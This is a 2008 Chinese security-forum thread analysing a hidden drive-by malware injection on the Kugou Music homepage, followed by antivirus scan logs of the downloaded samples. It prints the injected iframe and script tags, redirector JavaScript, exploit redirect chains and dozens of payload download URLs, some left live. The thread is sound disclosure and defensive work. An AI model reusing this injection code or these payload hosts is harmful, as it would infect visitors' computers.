查看: 7929|回复: 26
收起左侧

[病毒样本] Hunter Work:酷狗音乐首页隐蔽挂马详细分析+72只马

[复制链接]
ryota
发表于 2008-6-23 04:04:24 | 显示全部楼层 |阅读模式
近来有朋友反映酷狗音乐首页挂马,而且奇怪的是只有第一次访问该页时杀软会提示挂马;之后除非换IP,否则无论怎么刷新杀软都不会提示网页挂马。于是循着这个线索,打开了酷狗音乐首页(h**p://www.kugou.com/home),最终找到了极其隐蔽的挂马。

详细过程如下:

1.h**p://www.kugou.com/home该页面代码看似正常,但是有个看起来比较正常但是却比较隐蔽的iframe,代码如下:
<IFRAME marginWidth=0 marginHeight=0 src="cairing.htm" frameBorder=0 width=230 scrolling=no height=327></IFRAME>

这里的cairing.htm指向的是h**p://www.kugou.com/home/cairing.htm


2.每个独立IP首次访问h**p://www.kugou.com/home/cairing.htm这个页面时,源代码里会有一段代码如下:
<IFRAME id=cif123 src="h**p://count12.5lyes.net/sa.aspx?s1=0&s2=1214155605&s3=82585631941791&s4=1001282043&s5=621d5&n=0.5986579168677271" width=0 height=0></IFRAME>
<SCRIPT language=javascript id=clickjs src="h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001"></SCRIPT>

相同IP再次访问该页时则不会有该段代码,也就是说酷狗音乐首页的挂马很可能跟此有关。


3.某IP首次访问h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001这个个页面时,会读取本地coockies,检查是否登陆过酷狗,然后获取酷狗ID等。
   根据这些信息,生成一个iframe,并写入。这个IFRAME,也就是第2步中的5lyes的那行代码了。
   于是访问该行iframe。
   
4.就在访问该iframe中src的地址时,收到了一个奇怪的无关链接:
h**p://qq.bcccd.com/11214155595_19024924457258_1001282043_9b9570a2a3268104abea8c96b5799630.html
查看该数据包,详情如下:



注意看黄色高亮部分,也就是说上面这个无关连接引用自5lyes.net的链接,也就是第二部中的iframe的地址。
通俗点的理解就是,当访问第2部中的指向5lyes.net的iframe时,5lyes.net的服务器返回了这个“无关”链接。


5.紧追该“无关”链接,得到的代码是:
<script type="text/javascript">
//window.setTimeout('goo();',1*60*1000);
goo();
function goo()
{
document.write('<iframe width=100 height=100 border=0 src="h**p://ok.dessp.com/mmmgo.htm"></iframe>');
document.write('<iframe width=100 height=100 border=0 src="h**p://ie.ietop.com/ms.htm"></iframe>');
document.write('<iframe width=100 height=100 border=0 src="h**p://arp.aafrp.com/mmmmgo.htm"></iframe>');
document.write('<iframe width=100 height=100 border=0 src="h**p://mm1.yaoch.com/mmgo.htm"></iframe>');
//document.write('<iframe width=100 height=100 border=0 src="h**p://ok.dessp.com/m21214155595_23735419533072_1001282043_f91277f09fe5814ae062efc4cfff348f.html"></iframe>');
//document.write('<iframe width=100 height=100 border=0 src="h**p://mm1.yaoch.com/m1214155595_23735419533072_1001282043_f91277f09fe5814ae062efc4cfff348f.html"></iframe>');
//document.write('<iframe width=100 height=100 border=0 src="h**p://arp.aafrp.com/s1214155595_23735419533072_1001282043_f91277f09fe5814ae062efc4cfff348f.html"></iframe>');
document.write('<script src="h**p://service.o00o.cn:8081/click.aspx?id=test_2"><\/script>');
}</script>
<script src='h**p://s35.cnzz.com/stat.php?id=817650&web_id=817650' language='JavaScript' charset='gb2312'></script>


此时,酷狗音乐首页挂马的原因已经明晰。此次挂马是由两点引起的:
1.h**p://www.kugou.com/home/cairing.htm被植入恶意代码:<SCRIPT language=javascript id=clickjs src="h**p://service.o00o.cn:8082/click.aspx?sid=ad_3001"></SCRIPT>
2.计数站点5lyes.net的sa.aspx的代码可能代码被黑客入侵后遭受了恶意修改;或者是机房存在arp病毒导致sa.aspx被感染恶意代码(后者可能性不大)



PS.以上部分链接需要结合本地coockies才能访问


[ 本帖最后由 ryota 于 2008-6-23 16:27 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ryota
 楼主| 发表于 2008-6-23 04:07:13 | 显示全部楼层
下面分析下挂的马:

Log is generated by FreShow
[wide]http://ok.dessp.com/mmmgo.htm
    [frame]http://www.jsp369.cn/a1.htm
        [frame]http://www.regedit369.cn/index.htm
            [frame]http://www.regedit369.cn/Ms06014.htm
                [object]http://d.yuku369.cn/max.exe
            [frame]http://www.regedit369.cn/cuteqq.htm
                [frame]http://www.regedit369.cn/Ajax.htm
                    [object]http://d.yuku369.cn/max.exe
                [frame]http://www.regedit369.cn/Ms06014.htm
                    [object]http://d.yuku369.cn/max.exe
                [script]http://www.regedit369.cn/Real11.gif
                    [object]http://d.yuku369.cn/max.exe
                [script]http://www.regedit369.cn/Real.gif
                    [object]http://d.yuku369.cn/max.exe
                [frame]http://www.regedit369.cn/Bfyy.htm
                    [object]http://d.yuku369.cn/max.exe
                [frame]http://www.regedit369.cn/Lz.htm
                    [object]http://d.yuku369.cn/max.exe
            [frame]http://www.regedit369.cn/flash.htm
                [frame]http://www.regedit369.cn/ilink.html
                    [object]http://www.regedit369.cn/i115.swf
                    [object]http://www.regedit369.cn/i64.swf
                    [object]http://www.regedit369.cn/i47.swf
                    [object]http://www.regedit369.cn/i45.swf
                    [object]http://www.regedit369.cn/i28.swf
                    [object]http://www.regedit369.cn/i16.swf
                [frame]http://www.regedit369.cn/flink.html
                    [object]http://www.regedit369.cn/i115.swf
                    [object]http://www.regedit369.cn/i64.swf
                    [object]http://www.regedit369.cn/i47.swf
                    [object]http://www.regedit369.cn/i45.swf
                    [object]http://www.regedit369.cn/i28.swf
                    [object]http://www.regedit369.cn/i16.swf
            [frame]http://www.regedit369.cn/uuc.htm
                 [frame]http://www.regedit369.cn/UU.ini
                    [object]http://d.yuku369.cn/UUSee.CAB

Log is generated by FreShow.
[wide]http://ie.ietop.com/ms.htm
    [frame]http://www.worka.net.cn/a1.html
        [frame]http://www.worka.net.cn/add.html
            [frame]http://www.flashl.net.cn/lg.html
                [frame]http://www.flashp.net.cn/1.html
                    [object]http://www.sarvt.cn/google.exe
                [frame]http://www.flashp.net.cn/l.html
                    [object]http://www.sarvt.cn/google.exe
                [frame]http://www.flashp.net.cn/bf.html
                    [frame]http://www.flashp.net.cn/UUUpgrade.ini
                        [object]http://www.flashp.net.cn/UUSee.CAB
                [frame]http://www.flashp.net.cn/r.html
                    [object]http://www.sarvt.cn/google.exe
                [frame]http://www.flashp.net.cn/nr.html
                    [object]http://www.sarvt.cn/google.exe
            [object]http://www.tygvb.cn/4562.swf
            [object]http://www.tygvb.cn/4561.swf

            
Log is generated by FreShow.
[wide]http://arp.aafrp.com/mmmmgo.htm
    [frame]http://cv.vkhys.org.cn/vkhys/aa1.htm
        [frame]http://cv.vkhys.org.cn/f.htm
            [frame]http://cv.vkhys.org.cn/ilink.html
                [object]http://cv.vkhys.org.cn/i115.swf
                [object]http://cv.vkhys.org.cn/i64.swf
                [object]http://cv.vkhys.org.cn/i47.swf
                [object]http://cv.vkhys.org.cn/i45.swf
                [object]http://cv.vkhys.org.cn/i28.swf
                [object]http://cv.vkhys.org.cn/i16.swf
            [frame]http://cv.vkhys.org.cn/flink.html
                [object]http://cv.vkhys.org.cn/f115.swf
                [object]http://cv.vkhys.org.cn/f64.swf
                [object]http://cv.vkhys.org.cn/f47.swf
                [object]http://cv.vkhys.org.cn/f45.swf
                [object]http://cv.vkhys.org.cn/f28.swf
                [object]http://cv.vkhys.org.cn/f16.swf
        [frame]http://cv.vkhys.org.cn/bx14.htm
            [object]http://dm.xcvgj.org.cn/gd.exe
        [frame]http://cv.vkhys.org.cn/r10.htm
            [object]http://dm.xcvgj.org.cn/gd.exe
        [frame]http://cv.vkhys.org.cn/r11.htm
            [object]http://dm.xcvgj.org.cn/gd.exe
        [frame]http://cv.vkhys.org.cn/bxlz.htm
            [object]http://dm.xcvgj.org.cn/gd.exe

Log is generated by FreShow.
[wide]http://mm1.yaoch.com/mmgo.htm
    [frame]http://aaa.udd05.cn/xb.htm(找不到该页)


以上挂马中值得注意的是,近期新爆UUSEE网络电视的漏洞已经广泛被用于挂马,涉及的CLSID是2CACD7BB-1C59-4BBB-8E81-6E83F82C813B,请UUSEE用户重新到官网下载最新的UUSEE安装包重新安装或者是卸载UUSEE。
ryota
 楼主| 发表于 2008-6-23 04:10:35 | 显示全部楼层
所挂的马中,max.exe和uusee.cab解压后的exe下马相同,google.exe和uusee.cab解压后exe的MD5相同,gd.exe不是下载者,不下载木马。

max.exe连接到http://d.yuku369.cn/ble1.txt,下载35只木马:
h**p://jan1.fdsjan.cn/max1.exe
h**p://jan1.fdsjan.cn/max2.exe
h**p://jan1.fdsjan.cn/max3.exe
h**p://jan1.fdsjan.cn/max4.exe
h**p://jan1.fdsjan.cn/max5.exe
h**p://jan1.fdsjan.cn/max6.exe
h**p://jan1.fdsjan.cn/max7.exe
h**p://jan1.fdsjan.cn/max8.exe
h**p://jan1.fdsjan.cn/max9.exe
h**p://jan1.fdsjan.cn/max10.exe
h**p://jan1.fdsjan.cn/max11.exe
h**p://jan1.fdsjan.cn/max12.exe
h**p://jan1.fdsjan.cn/max13.exe
h**p://jan1.fdsjan.cn/max14.exe
h**p://jan1.fdsjan.cn/max15.exe
h**p://jan1.fdsjan.cn/max16.exe
h**p://jan1.fdsjan.cn/max17.exe
h**p://jan1.fdsjan.cn/max18.exe
h**p://jan1.fdsjan.cn/max19.exe
h**p://jan1.fdsjan.cn/max20.exe
h**p://www.fdsjan.cn/max21.exe
h**p://www.fdsjan.cn/max22.exe
h**p://www.fdsjan.cn/max23.exe
h**p://www.fdsjan.cn/max24.exe
h**p://www.fdsjan.cn/max25.exe
h**p://www.fdsjan.cn/max26.exe
h**p://www.fdsjan.cn/max27.exe
h**p://www.fdsjan.cn/max28.exe
h**p://www.fdsjan.cn/max29.exe
h**p://www.fdsjan.cn/max30.exe
h**p://www.fdsjan.cn/max31.exe
h**p://www.fdsjan.cn/max32.exe
h**p://www.fdsjan.cn/max33.exe
h**p://www.fdsjan.cn/max34.exe
h**p://www.fdsjan.cn/max35.exe

其中34、35文件不存在,下到33只

google.exe下载35只:
h**p://www.irwxg.cn/down/e1.exe
h**p://www.irwxg.cn/down/r2.exe
h**p://www.irwxg.cn/down/a3.exe
h**p://www.irwxg.cn/down/j4.exe
h**p://www.irwxg.cn/down/y5.exe
h**p://www.irwxg.cn/down/m6.exe
h**p://www.irwxg.cn/down/r7.exe
h**p://www.irwxg.cn/down/i8.exe
h**p://www.irwxg.cn/down/x9.exe
h**p://www.irwxg.cn/down/l10.exe
h**p://www.rwxow.cn/down/b11.exe
h**p://www.rwxow.cn/down/z12.exe
h**p://www.rwxow.cn/down/m13.exe
h**p://www.rwxow.cn/down/n14.exe
h**p://www.rwxow.cn/down/o15.exe
h**p://www.rwxow.cn/down/g16.exe
h**p://www.rwxow.cn/down/j17.exe
h**p://www.rwxow.cn/down/l18.exe
h**p://www.rwxow.cn/down/c19.exe
h**p://www.rwxow.cn/down/t20.exe
h**p://www.werxv.cn/down/p21.exe
h**p://www.werxv.cn/down/x22.exe
h**p://www.werxv.cn/down/m23.exe
h**p://www.werxv.cn/down/o24.exe
h**p://www.werxv.cn/down/b25.exe
h**p://www.werxv.cn/down/e26.exe
h**p://www.werxv.cn/down/v27.exe
h**p://www.werxv.cn/down/m28.exe
h**p://www.werxv.cn/down/u29.exe
h**p://www.werxv.cn/down/h30.exe
h**p://www.werxv.cn/down/b31.exe
h**p://www.werxv.cn/down/c32.exe
h**p://www.werxv.cn/down/u33.exe
h**p://www.werxv.cn/down/f34.exe
h**p://www.werxv.cn/down/p35.exe

全部链接有效,下到35只。

除swf外,全部样本共计72只:

[ 本帖最后由 ryota 于 2008-6-23 04:27 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ryota
 楼主| 发表于 2008-6-23 04:20:29 | 显示全部楼层

至此,酷狗音乐首页挂马分析清楚。

再多说几句,某些迹象表明此次挂马事件与cuteqq难脱干系。
cuteqq是什么,百度一下就知道。对此,只想说:多行不义必自毙。
而酷狗前几天刚修复了一个aspx感染恶意代码的问题,现在又发现挂马。
从中可以看出酷狗官方对自己所肩负的网络安全责任的漠视。
希望酷狗官方正视自己的问题和不足,对用户负责,尽快修正挂马,弥补网站管理漏洞。
FBAV
发表于 2008-6-23 06:29:20 | 显示全部楼层
MicroVita AntiSpyware  
_____________________________________________
                                          
             风暴微塔反间谍 T2
[强力查杀各种Win32位的病毒,木马,蠕虫,恶意软件]                  
                   http://221.10.254.214/
----------------------------------------------
开始扫描……


正在检查启动……
[d:\Virus1\mm\mm\aa11.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:18600  MD5:46a55f4dc70c6796053e01ac6be7c273


[d:\Virus1\mm\mm\aa13.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:18268  MD5:fd8735e61819a007b81635dc869e7620


[d:\Virus1\mm\mm\aa15.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:19300  MD5:59e0334fcaf9c638deec10fa80301072


[d:\Virus1\mm\mm\aa17.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:18517  MD5:c4a37ec69f03b288472951dc0c541e72


[d:\Virus1\mm\mm\aa19.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:12211  MD5:39397e5c14b366ac66bfc8f4931feac9


[d:\Virus1\mm\mm\aa21.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:18280  MD5:ecf69b2be8174fc85cc5b8ad0094969f


[d:\Virus1\mm\mm\aa23.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:51200  MD5:4b750e711b658a7217658f63acf5a0ee


[d:\Virus1\mm\mm\aa25.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:52224  MD5:fa26093130f1e3c4de284e49ea2aa5f2


[d:\Virus1\mm\mm\aa3.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:19364  MD5:a26942921a80c9bd1cb7cc9d309a173c


[d:\Virus1\mm\mm\aa5.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:17853  MD5:d0e3cddff2d7f3a911d9184dd3410aa4


[d:\Virus1\mm\mm\aa7.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:52736  MD5:56d036b5913fe3a33391ea5cc5eedc81


[d:\Virus1\mm\mm\aa9.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:22664  MD5:e788b4f4664c71d561985780cd186de5


[d:\Virus1\mm\mm\aa10.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:17495  MD5:d36b1b014adeec43e9b6bb8f79e0b64b


[d:\Virus1\mm\mm\aa14.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:18408  MD5:bde0330bb23809241ae82616786b5b94


[d:\Virus1\mm\mm\aa18.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:18492  MD5:7f43e8e4e9f9de3231c448acb871b6ca


[d:\Virus1\mm\mm\aa22.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:12335  MD5:616b5399524974f684b251a1e1cba288


[d:\Virus1\mm\mm\aa26.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.Unknow
文件信息:  大小:17538  MD5:082a1412547aebea1cb50f01f285455b


[d:\Virus1\mm\mm\aa6.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.NkHack.FSG.A
文件信息:  大小:33261  MD5:fed534ec82aa563e7757b5adc8bb4c34


[d:\Virus1\mm\mm\aa12.exe.VIRUS]
                    …………发现Spy!报告:[2]
文件信息:  大小:52736  MD5:ff22db3ae4667ed202ef91c6c60a355d


[d:\Virus1\mm\mm\aa16.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:18251  MD5:a999067cd0d182a3e7fa71c2f56e2c11


[d:\Virus1\mm\mm\aa24.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.Unknow
文件信息:  大小:30984  MD5:48dce34320f5639ce5a590ca1ba0a270


[d:\Virus1\mm\mm\aa8.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:9739  MD5:f2b6e1033e02139cfabca98a8d233a17


[d:\Virus1\mm\mm\aa20.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:15585  MD5:b5531fe39891a379b57e851ad6486d79


[d:\Virus1\mm\mm\aa4.exe.VIRUS]
                    …………发现Spy!报告:[2] [1] Win32.F/S.ByDwing
文件信息:  大小:23232  MD5:51e4562bde4ce2a2dda5e3905a95e1a6


[d:\Virus1\mm\mm\a3.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:20215  MD5:336148951103f019649d45fed6d1214d


[d:\Virus1\mm\mm\b11.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:25788  MD5:9853ed91fbadb1d3fd39043e1c6fa5bb


[d:\Virus1\mm\mm\b31.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:19731  MD5:e44a029ad247406660fa1777e456fdcc


[d:\Virus1\mm\mm\c32.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:15154  MD5:5aa4a6285eee662e22d96a8020dbae45


[d:\Virus1\mm\mm\e1.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:23367  MD5:54c21296817aee03393a0c91d88ba3d4


[d:\Virus1\mm\mm\e26.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:15129  MD5:ac392a45c4cbdb61c10af31b10d46be1


[d:\Virus1\mm\mm\f34.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:14649  MD5:e205bffa08c11f0df898b72597d42dab


[d:\Virus1\mm\mm\google.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:36796  MD5:54ccd54f51a0d054d71053d1c542f2ed


[d:\Virus1\mm\mm\h30.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16530  MD5:9eab989bdd3e0b8181306cf108d7bd2e


[d:\Virus1\mm\mm\i8.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:19759  MD5:f45cacbd2c341ecd5c188a9e4de4c329


[d:\Virus1\mm\mm\j17.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:17228  MD5:ae7a191e45bc358a192ae7468a2e9589


[d:\Virus1\mm\mm\j4.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:17037  MD5:f12bfbe63b3f994c7fdaac5bc40e67e4


[d:\Virus1\mm\mm\l10.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16051  MD5:3e2eb5d9bd00a7452e5a42a874b306d4


[d:\Virus1\mm\mm\l18.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:20283  MD5:e09f6e59de81fceeeda4d61c73668edc


[d:\Virus1\mm\mm\m13.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:15089  MD5:545e6114caa0e6a51dcd5eded924d6de


[d:\Virus1\mm\mm\m23.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16562  MD5:fb6fbee862167cc5f218a60e82a2e0a5


[d:\Virus1\mm\mm\m28.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:19684  MD5:d835ac4784614a01b408946ce768bb96


[d:\Virus1\mm\mm\m6.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:19419  MD5:c944ba13f833ee9914b925329438d55a


[d:\Virus1\mm\mm\max.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:11907  MD5:ee1286c6efdaba9335d3b3be2bbbf971


[d:\Virus1\mm\mm\max1.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:17707  MD5:2c0b01e1c3ef5650e4c1cf033119aadb


[d:\Virus1\mm\mm\max10.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16418  MD5:fa84676bb56bd4aea73616603c179b78


[d:\Virus1\mm\mm\max11.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:17017  MD5:f355d59664047cb10e700b5343c0c15d


[d:\Virus1\mm\mm\max12.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:15687  MD5:817660008a6e52345df73724162ec683


[d:\Virus1\mm\mm\max13.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:15446  MD5:652c9977bd952d05cab4d5f40bc47d75


[d:\Virus1\mm\mm\max14.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16051  MD5:c3a615ceb950e5f1634921f50416ab00


[d:\Virus1\mm\mm\max15.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:15154  MD5:80f3afb4e20fb1766aa5480a12cf70a9


[d:\Virus1\mm\mm\max16.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16530  MD5:db79efce3449499fa6e1c1b6ed92baa9


[d:\Virus1\mm\mm\max17.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16613  MD5:1d6c97b479327acc78e851dae52476a4


[d:\Virus1\mm\mm\max18.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:15129  MD5:f15ec6d726d3475c5dec8ea1f670d808


[d:\Virus1\mm\mm\max19.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:15467  MD5:2ee894f191a5206b42058c96a5ed9a8f


[d:\Virus1\mm\mm\max2.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16933  MD5:3b9ec97539f9d8bf9933859edd711d3b


[d:\Virus1\mm\mm\max20.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:15751  MD5:ee076a785f173d950d1a4f1901dd7691


[d:\Virus1\mm\mm\max21.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16317  MD5:0c67b68cb64884fbe013ba63c28cb6cb


[d:\Virus1\mm\mm\max22.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16168  MD5:b3de60ce052ea3ab45b1352c0ec20555


[d:\Virus1\mm\mm\max23.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16461  MD5:68a1a3cd0d7666ab74c48a8d62b42dce


[d:\Virus1\mm\mm\max24.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16734  MD5:defc62666d9edba9cceee090ba0f14bd


[d:\Virus1\mm\mm\max25.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:9596  MD5:2e94e92af1b1ece6ffd3ce2f7e8e49a9


[d:\Virus1\mm\mm\max26.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:10728  MD5:36900a60d35142f97fba21578fbdcc5e


[d:\Virus1\mm\mm\max27.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:10876  MD5:378c8da06971464aa74d94297fce0e43


[d:\Virus1\mm\mm\max28.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:10804  MD5:9f747a4701fbe4310e25ff3a9216e266


[d:\Virus1\mm\mm\max29.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:26180  MD5:eb2a41da6f7d29f138b41ef2008d435b


[d:\Virus1\mm\mm\max3.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16651  MD5:134aec273395a9afc86c840a1feb5159


[d:\Virus1\mm\mm\max30.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:28168  MD5:1d97a22475e5b5d6b228dca37a00c312


[d:\Virus1\mm\mm\max31.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:20239  MD5:8cfe713da28c3e99bfa1f484f243f413


[d:\Virus1\mm\mm\max32.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:19191  MD5:05e00202b69c5e639f5d0267565cfce3


[d:\Virus1\mm\mm\max35.exe]
                    …………发现Spy!报告:[2]
文件信息:  大小:32951  MD5:763e65c55d30004f2b713f5bb4e741e2


[d:\Virus1\mm\mm\max4.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16591  MD5:f177bcc1f8e7e20c7e39f7c28668488b


[d:\Virus1\mm\mm\max5.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16727  MD5:868a707420b7b2a92d969995797aa1a5


[d:\Virus1\mm\mm\max6.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:17057  MD5:dfed6668cd299f4945fe0ea1dd911856


[d:\Virus1\mm\mm\max7.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:17037  MD5:4ec843df8ed160157c26bec7859a9695


[d:\Virus1\mm\mm\max8.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:17199  MD5:d3e30be123436bc079011bafe38f20e4


[d:\Virus1\mm\mm\max9.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16602  MD5:b640235efb2b1d253ca2f0d77b4310dc


[d:\Virus1\mm\mm\n14.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16591  MD5:b245bc4621dc2d8b6dd374a6ee9ec60b


[d:\Virus1\mm\mm\o15.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:19237  MD5:e17f8a18f2448a64174f7a665563c0d6


[d:\Virus1\mm\mm\o24.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16255  MD5:614b00fe6e00e60fae65c782ba6f8434


[d:\Virus1\mm\mm\p21.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:18811  MD5:39aa318b1cc26536f727fbbe66939430


[d:\Virus1\mm\mm\r2.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:20071  MD5:c5a0ca47fa177b3bd8d3b63d0c82fe80


[d:\Virus1\mm\mm\r7.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16289  MD5:51762af6f7a0309158209a4c459584a8


[d:\Virus1\mm\mm\t20.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:15467  MD5:6729b242485199184eeb06c065b84fe2


[d:\Virus1\mm\mm\v27.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16168  MD5:e86ae8dfdcff44e55b0cc50749867d45


[d:\Virus1\mm\mm\x9.exe]
                    …………发现Spy!报告:[1] Win32.Unknow
文件信息:  大小:19335  MD5:56aaa266de725829bec0cd305e75db4c


[d:\Virus1\mm\mm\y5.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:16926  MD5:3a633d819f7a54b32701af32fc0a607c


[d:\Virus1\mm\mm\z12.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:17017  MD5:c9355cc3cebbe875d339e7638a1ee9a8


文件数:97   病毒数:87  比重:0.8969072164948
OK  扫描完毕!

  ***日志解释
[4] 集中有害分析引擎
[3] 全局系统判断引擎   
[2] 文件特征码引擎
[1] 文件启发式引擎
swordlea
发表于 2008-6-23 07:18:43 | 显示全部楼层

没用过“风暴微塔”,不过……

[d:\Virus1\mm\mm\max1.exe]
                    …………发现Spy!报告:[1] Win32.F/S.ByDwing
文件信息:  大小:17707  MD5:2c0b01e1c3ef5650e4c1cf033119aadb

这一个扫描结果是否在“[1] 文件启发式引擎”启用的时候发现的,麻烦用PEID查一下,是不是“Upack *.* -> Dwing”的壳?面对近期越来越多的采用“Upack *.* -> Dwing”加壳的恶意代码,利用入口点处“ 60 E8 09 00 00 00 *”的壳特征作为识别依据,这个思路非常好!
28654621
头像被屏蔽
发表于 2008-6-23 08:45:27 | 显示全部楼层
avast
58个
footcat
发表于 2008-6-23 08:54:54 | 显示全部楼层
我昨天用Opera上过一次,怎么卡巴没反应啊。晕。
hahacomcn
发表于 2008-6-23 09:15:15 | 显示全部楼层
清~

Begin scan in 'C:\Documents and Settings\haha\桌面\mm'
C:\Documents and Settings\haha\桌面\mm\a3.exe
      [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
      [NOTE]      A backup was created as '488cf92b.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\b11.exe
      [DETECTION] Is the Trojan horse TR/Downloader.Gen
      [NOTE]      A backup was created as '488ff929.qua'  ( QUARANTINE )
C:\Documents and Settings\haha\桌面\mm\b25.exe
